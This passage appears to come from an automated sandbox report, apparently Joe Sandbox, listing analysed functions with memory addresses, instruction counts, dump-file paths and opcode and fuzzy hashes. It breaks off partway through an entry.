                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 0b4c1ba5f4c3e8568460a917849240ee7d11210dce756e12cf07391d85ff6013
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: 02D01234B619044F870CA738885987477D1EB6A216B9540ADD00AC72B1D96ADC99C781
                                                                      Function 00007FFAAB470B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 5d6e81b34bc9f67479e3927315d3e938a9b7610a88fad50f39688fefc833bcb4
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: D3D012345768498FC650E728D9954A4BB90FB0A214F8901D0D40CC7161D3569894C741
                                                                      Function 00007FFAAB4706A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: 9182ade74973473efd9a91cb18fcff3fe863572f8a8b4ccf94988b8c2aa409b5
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: DEC08C00E0B40B83B810B33E14120ACA9006BC7290FD08032C10C802E19C4E20DD81C6
                                                                      Function 00007FFAAB4712B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 43e346325f29e7365e5b0cbc07af6b3bfadc9982b9ec397910975f9166f44ce6
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: A0C04C345519498FC948EB29C88591477A0FB1A215BD600D0E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB473416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7cab2fd34f76c22ad1fe4beac78166360f3b23ed1b8baa273410c7df7d6692a7
                                                                      • Instruction ID: 4e89c93893d795ec3df0489288799d452033bf40f1d01e3519721bc4775d58a7
                                                                      • Opcode Fuzzy Hash: 7cab2fd34f76c22ad1fe4beac78166360f3b23ed1b8baa273410c7df7d6692a7
                                                                      • Instruction Fuzzy Hash: CFC08C02F08D6A83F218A228C02167F04829F80648F8404B8E00DCA3C6CC0CAB0102C2
                                                                      Function 00007FFAAB473A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 6db26826a2423f8c86332fdba027ea285eabc923419afa289c2718a17ee9d05b
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 83C02B10C0E004C3E329873044051FD31401F5A300F05C172C00E52091DE28244C91C0
                                                                      Function 00007FFAAB4706C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: a5735ffe0b8818d5644c87d865a7e8281c1521c7f2e206bd483853161b9d9d55
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: 72B01200C5740F42A814337E0842064B8505B46140FC04070D40C501D5984E10EC42C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4709B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2388904058.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_7ffaab470000_MQYzEFytUKABjmoxvNTPTwUrcL.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 695407360afe483742a26e70f6642c61ef3d3130ff1df29031e4ccb588e4268e
                                                                      • Instruction ID: 40cae4d5181ea78131fe2c0bbc18da0b7c6517f1a69a3b279efe9b1d56bf911b
                                                                      • Opcode Fuzzy Hash: 695407360afe483742a26e70f6642c61ef3d3130ff1df29031e4ccb588e4268e
                                                                      • Instruction Fuzzy Hash: 1351D34BB4942376E11237FCF40A8FC6BA8EFD1376B494AB7D04DC91934D0968C582E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB450D4C Relevance: 6.5, Strings: 5, Instructions: 259COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5Z_H$b43$r63$r63
                                                                      • API String ID: 0-999556193
                                                                      • Opcode ID: b949bb1cfa4cca6b25bac7dd532f6cf71169356836d476c6070eecfe03ee481a
                                                                      • Instruction ID: 2a4ba6b2b8b38703a0bc97454e77e026f035c4ec7c507aad971ea01714370a9b
                                                                      • Opcode Fuzzy Hash: b949bb1cfa4cca6b25bac7dd532f6cf71169356836d476c6070eecfe03ee481a
                                                                      • Instruction Fuzzy Hash: D3910AB6A08E9D8FE749DB68C8557A97FE1FB56350F4441BEC04DCB3D6CA7818048780
                                                                      Function 00007FFAAB481715 Relevance: 3.2, Strings: 2, Instructions: 713COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I$r63
                                                                      • API String ID: 0-3249758050
                                                                      • Opcode ID: cf3875ad8681288c412ae1018bbf1824aea9b94dec7972cfd8dc8dc579194aac
                                                                      • Instruction ID: 94d059cdf64e6d6eec6bbbbc3072e697f114c08d1628c91e29cae74af602e5ec
                                                                      • Opcode Fuzzy Hash: cf3875ad8681288c412ae1018bbf1824aea9b94dec7972cfd8dc8dc579194aac
                                                                      • Instruction Fuzzy Hash: 37D19D6191D6964BE31D47694C420B57BD2EF9B281B18C2BED9EFC70A7D918E80B82C1
                                                                      Function 00007FFAAB481958 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 19996f2ea6cb7b366eabecff997bddfb714a82522b29692c0cc3e93f5b4b1f8a
                                                                      • Instruction ID: 506a7987c8ee68a09ff2ce4e0d434805360c8e36ce74b49c1f6656a8f694d491
                                                                      • Opcode Fuzzy Hash: 19996f2ea6cb7b366eabecff997bddfb714a82522b29692c0cc3e93f5b4b1f8a
                                                                      • Instruction Fuzzy Hash: 56816962E1D65A47E31C4A6D4C420B277D6EBCB295B18C27EDDEFC7197D818E80B42C1
                                                                      Function 00007FFAAB482CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 3dfe6043f6843755ec9df008873b0287e627403d50246de7a27e06c6bd0efa13
                                                                      • Instruction ID: a41e4722c846c4c463e16e16ea9f1712b92d130c97609decbfb9d60e908230a1
                                                                      • Opcode Fuzzy Hash: 3dfe6043f6843755ec9df008873b0287e627403d50246de7a27e06c6bd0efa13
                                                                      • Instruction Fuzzy Hash: 5641C631A0C95ACFEB58E798C451BB877E2FBA9350F0442B9D41ED72D6CE286C4987C1
                                                                      Function 00007FFAAB485494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: 32375f7704f603b54954ec2c11976d4efe9444f9cf4db940d3fa710c85956c3b
                                                                      • Instruction ID: d384b057b3a690a7391b12a7152cbe517525381e5bae0feb8b2a191c1a726c34
                                                                      • Opcode Fuzzy Hash: 32375f7704f603b54954ec2c11976d4efe9444f9cf4db940d3fa710c85956c3b
                                                                      • Instruction Fuzzy Hash: 26214CB2A199598FE798EB68C8566F8B3E1FFA9341F4085F5D04DC3192CD346D858B80
                                                                      Function 00007FFAAB48DF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 597ef5aaf84d01b8a7ee159592277a6b5e88cac23b354402fa4e473e80396abd
                                                                      • Instruction ID: 63caf19e45091f37ef6c2d7c790dd618b32c7df5eb81dbc668c4f2da073af8e8
                                                                      • Opcode Fuzzy Hash: 597ef5aaf84d01b8a7ee159592277a6b5e88cac23b354402fa4e473e80396abd
                                                                      • Instruction Fuzzy Hash: CA01F732F0991A8BEB54E7A8D4453FD73E2EF94351F04857AD21DD3190DE38A9948BC0
                                                                      Function 00007FFAAB4837C9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: f284d4d64135dd8af87f26ca75c30793508fc92f1c08ccd5c5302e21286a8fb7
                                                                      • Instruction ID: ef584b4bd0f9a2371cb140f86be975e99477a4d177fc4e8d67ba3617aadb8806
                                                                      • Opcode Fuzzy Hash: f284d4d64135dd8af87f26ca75c30793508fc92f1c08ccd5c5302e21286a8fb7
                                                                      • Instruction Fuzzy Hash: E5F0E56150E7C04FD71A9A3888698517F60EF2720134A41EFC045CF1E3DA1DCC88C752
                                                                      Function 00007FFAAB48AC59 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: b6683c5746c04d043220b83a23ab60948d3f58f10f4edc2b3c410b9af7fb045d
                                                                      • Instruction ID: e0799a57bffe279d3bb1c8d2dba211982506b9a8211fa688546437b309e05282
                                                                      • Opcode Fuzzy Hash: b6683c5746c04d043220b83a23ab60948d3f58f10f4edc2b3c410b9af7fb045d
                                                                      • Instruction Fuzzy Hash: 40E0657150A7C48FD719A67888698657FA0EF6720174951EEC045CF1A3EA1D8885C751
                                                                      Function 00007FFAAB48AD29 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 8ff665bf502cb4e09bd759d1e6cf2d21b2c7702e1d34fe1e111012075151ae5c
                                                                      • Instruction ID: 7d3e241e690c04e08218fcb51fda55da4c8b1307b9aef79e5ec1253b9e08a7d1
                                                                      • Opcode Fuzzy Hash: 8ff665bf502cb4e09bd759d1e6cf2d21b2c7702e1d34fe1e111012075151ae5c
                                                                      • Instruction Fuzzy Hash: 0DF0E57090E3C48FC71ADB348829414BFA0EF6720134A45EFC045CF1A3EA2D8888CB01
                                                                      Function 00007FFAAB482539 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 74e794c314814809519a8e7333b88356f68b5256d7c3304fb3a1344d98d9690c
                                                                      • Instruction ID: 9bbabbd86bf3a29aa04a346187c22bf329de78387174c6b7f3a577c7176c81db
                                                                      • Opcode Fuzzy Hash: 74e794c314814809519a8e7333b88356f68b5256d7c3304fb3a1344d98d9690c
                                                                      • Instruction Fuzzy Hash: E5F0E571A0A3C04FCB15DB3884A44547F60EF6720074941EEC045CF1E7DA2CD84AC700
                                                                      Function 00007FFAAB48B229 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 814c28cfa10c4e1c0bac6d60e13170ad899c77c0c9af17574073379e4b8755c6
                                                                      • Instruction ID: bf0dc71b756ad3866bde4f70ed551769ffe9311e09ac155b67902bfb345e3eff
                                                                      • Opcode Fuzzy Hash: 814c28cfa10c4e1c0bac6d60e13170ad899c77c0c9af17574073379e4b8755c6
                                                                      • Instruction Fuzzy Hash: 6DE0926144A3C04FC705AB7888658543FA0DE2B21178A40DEC045CF0B3D21E8849C712
                                                                      Function 00007FFAAB463FC9 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab460000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: e91a3e4eedff9f163ca49ad744afd856541697ca40cf90d52167f1ff9b63c75c
                                                                      • Instruction ID: 15aa730e237559b89c3359a848a6554f7311aa7bac58a6f3c26e95c8fd5da99e
                                                                      • Opcode Fuzzy Hash: e91a3e4eedff9f163ca49ad744afd856541697ca40cf90d52167f1ff9b63c75c
                                                                      • Instruction Fuzzy Hash: 59E0126154E3C04FC74A9B74887A9547FB0EE6721074F41EEC085CF5B3D61D9849C701
                                                                      Function 00007FFAAB4825C9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 48e351cd30abb9e7705ea2c6b7225721b9ac860f60cb64ea75d1835c1353f2a9
                                                                      • Instruction ID: ee824d2981d9c9ff3989126930468c8127fb7e9e7630e69a31de1b07a6ef572b
                                                                      • Opcode Fuzzy Hash: 48e351cd30abb9e7705ea2c6b7225721b9ac860f60cb64ea75d1835c1353f2a9
                                                                      • Instruction Fuzzy Hash: 1DE01A7144F7C04FCB4AEB7488698547FA1AE6721178A41EEC049CF1B3E62E8849C701
                                                                      Function 00007FFAAB4889A9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab481000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: adc2a2869d49417c7d2c3a4e5b93ea41a0ca96cd0f47f5c84ce626e47fe5c379
                                                                      • Instruction ID: 3529e2c3aa8f7f7a5f0cfd465985b311be178d32710ee6d3fc3b8c3a534c07cd
                                                                      • Opcode Fuzzy Hash: adc2a2869d49417c7d2c3a4e5b93ea41a0ca96cd0f47f5c84ce626e47fe5c379
                                                                      • Instruction Fuzzy Hash: ABE01A7144F7C08FCB4AEB74886A8547FB1AE6721078A40EEC089CF1B3E62E8849C701
                                                                      Function 00007FFAAB4508D0 Relevance: .2, Instructions: 172COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                                                      • Instruction ID: b870b6bc90a23b9add67cbd2ca7872be046cab6a3111a16cd423a2fb10a2e75b
                                                                      • Opcode Fuzzy Hash: 96eaaab7907db59c5e9c261e54b015b41a90df8e5c9c15836d384e321062bb8c
                                                                      • Instruction Fuzzy Hash: 0A412F3264CA648FD714FBACE4889F97BE0EF8632170549BBD08ACB063D910AC8183C1
                                                                      Function 00007FFAAB45090D Relevance: .2, Instructions: 150COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a6e83df51b82c857ae3f9e412b45bdb6b67cc465ec53c654fcdb90534e3c36a6
                                                                      • Instruction ID: b1986d9e16a835eee507792764fd5dd2a1dec0beb1d423bfc9463e87a7b3d382
                                                                      • Opcode Fuzzy Hash: a6e83df51b82c857ae3f9e412b45bdb6b67cc465ec53c654fcdb90534e3c36a6
                                                                      • Instruction Fuzzy Hash: 1C411553A4EA956FE314B37CE05A9F97BD0DF86265B0449FED08EC61A3CD086C818281
                                                                      Function 00007FFAAB450908 Relevance: .1, Instructions: 118COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction ID: faf4efb2ab944e200b9afe7d364de4d2c9b83e7877de95e667fe599b5e5e9f02
                                                                      • Opcode Fuzzy Hash: 0cc6d291224cff623f15b76e085ee268e028e3e3f7966c47599f22330fc3e73a
                                                                      • Instruction Fuzzy Hash: F121D53130DC184FE768EB0CE889DB973D1EB5A32170101BAE58EC7136E911EC8287C1
                                                                      Function 00007FFAAB450960 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2bd476999a1083d0df64aec6507774a794138edfd323787ba1b05c5ddb38423f
                                                                      • Instruction ID: 7bc675bf0097203ec2b7d2fd0e611623dc6ce63b4dfa56a5d20b39f03655c47e
                                                                      • Opcode Fuzzy Hash: 2bd476999a1083d0df64aec6507774a794138edfd323787ba1b05c5ddb38423f
                                                                      • Instruction Fuzzy Hash: 6A312452A4EE962FE258B37CE44A9B97BD1DF85361B0445FED40EC32E3CC086C824280
                                                                      Function 00007FFAAB45116D Relevance: .1, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: efe06eaf8d293fa8def6603c1256b53deca664820298b8f7409dc436c80bd092
                                                                      • Instruction ID: d780a439df2f6076397de4304c8d1d98492456db55d5d94e30905fe51911f33d
                                                                      • Opcode Fuzzy Hash: efe06eaf8d293fa8def6603c1256b53deca664820298b8f7409dc436c80bd092
                                                                      • Instruction Fuzzy Hash: 5F31E83190DA4ACFEF45EB68C8559B97BF0FF5A300B0446FED00EC71A2DA299844C781
                                                                      Function 00007FFAAB450998 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e709a1c752094646b66dad34bc21113e93fa7e4985fd536de2d28e47f631fd4b
                                                                      • Instruction ID: 5413226575510e4ce504c71488f8aa4f3e2792490e73f129dbba3a62286134a9
                                                                      • Opcode Fuzzy Hash: e709a1c752094646b66dad34bc21113e93fa7e4985fd536de2d28e47f631fd4b
                                                                      • Instruction Fuzzy Hash: 4C313821A0EE995FE748E738805AA79BBD2EF99354F1441BDD44EC32E3CC14AC428380
                                                                      Function 00007FFAAB450C25 Relevance: .1, Instructions: 96COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_7ffaab450000_jW5TA1J9Z1.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 887d754d35e71ebd23d4f9376cf89c2e087611e7d59702e088348e32f0cb118a
                                                                      • Instruction ID: 78cee205e5d92a32c9f0530082248a69b8d875a74ab429502f13c4666d6cd9d8
                                                                      • Opcode Fuzzy Hash: 887d754d35e71ebd23d4f9376cf89c2e087611e7d59702e088348e32f0cb118a
                                                                      • Instruction Fuzzy Hash: 0E31EA7AA0DA49DBE716E768D8451EC7FA0EF83351F1586BBD00CCA2D3D938294987C1
                                                                      Function 00007FFAAB482601 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2469930318.00007FFAAB481000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB481000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
